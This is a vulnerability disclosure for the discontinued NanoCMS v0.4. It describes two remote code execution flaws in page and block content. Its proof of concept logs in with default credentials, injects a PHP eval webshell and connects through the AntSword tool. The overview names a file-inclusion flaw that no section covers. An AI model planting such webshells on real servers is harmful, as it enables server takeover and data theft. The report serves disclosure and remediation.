Vulnerability Report: NanoCMS v0.4 Multiple Critical Vulnerabilities

  1. Vulnerability Overview

Product: NanoCMSVersion: v0.4 (last official release: 2009; discontinued)Vendor: Kalyan Chakravarthy (project discontinued)Vulnerabilities:

  • Unauthenticated Remote Code Execution (RCE) via Unsanitized Content Input
  • Unrestricted File Inclusion (UFI) via User-Controlled Path Variables

  1. Vulnerability 1: Unauthenticated Remote Code Execution

CVE Candidate Type: Remote Code Execution (CWE-94)CVSS v3.1 Base Score: 9.8 (Critical)Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

NanoCMS v0.4 fails to sanitize user-supplied content when creating/editing pages. Attackers can inject arbitrary PHP code (e.g., <?php @eval($_POST['cmd']); ?>) into page content via the admin panel (or unauthenticated endpoints, if access controls are weak). When the affected page is rendered (e.g., via index.php?page=1), the injected code executes with the privileges of the web server process.

Proof of Concept (PoC)
  1. Access the NanoCMS admin panel (/data/nanoadmin.php) (default credentials: admin/demo).
  2. Create a new page (or edit an existing one) and insert the following payload into the “Content” field:
  3. php
  4. 运行
1
<?php @eval($_POST['cmd']); ?>

img

  1. Save the page (assign it a slug, e.g., page=1).
  2. Send a POST request to the affected page URL (http://localhost:777/index.php?page=1) with the cmd parameter containing arbitrary system commands:
  3. Configure the AntSword tool with the following connection details:
  • Target URL: http://localhost:777/index.php?page=1

img

  • Connection Password (webshell parameter): cmd
  • Encoding: base64
  • Connection Type: PHP

Test the connection—AntSword successfully establishes a session and gains control of the server filesystem, confirming the RCE vulnerability.

img

  1. Vulnerability 2: RCE via Unsantized Block Content

CVSS v3.1 Base Score: 9.8 (Critical)Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Beyond page content, NanoCMS v0.4’s “Blocks” content editing feature also fails to filter PHP code. Attackers can inject malicious code into block content; when the block is rendered on any page (e.g., the homepage), the code executes, triggering a second RCE vulnerability.

Proof of Concept (PoC)
  1. In the admin panel, access the “Block Management” feature.
  2. Create/edit any block, and insert the same PHP webshell into the block content:
1
<?php @eval($_POST['cmd']); ?>

img

  1. Associate the block with the website homepage (e.g., the “below navigation” section).
  2. Configure AntSword with the homepage URL (index.php?page=home) and the same connection parameters—successfully establishing a session and executing commands confirms the second RCE vulnerability.

img

img

  1. Impact

Both RCE vulnerabilities allow attackers to:

  • Fully compromise the web server and execute arbitrary system commands;
  • Read/modify any files on the server;
  • Pivot to internal network environments for further lateral movement.

  1. Remediation

NanoCMS v0.4 is discontinued, with no official patches available. Mitigation steps:

  • Immediately discontinue use of NanoCMS v0.4 and migrate to a maintained CMS;
  • If unavoidable:
    • Restrict admin panel access (IP whitelisting + strong passwords);
    • Force-filter PHP tags from all user input (e.g., using PHP’s strip_tags() function);
    • Disable dangerous PHP functions (e.g., eval()) in php.ini.

  1. Disclosure Timeline

  • [2026.1.22]: Identified both RCE vulnerabilities;
  • [2026.1.22]: Attempted vendor contact (project terminated, no response);
  • [2026.1.22]: Submitted CVE request.

Reporter: [tubby]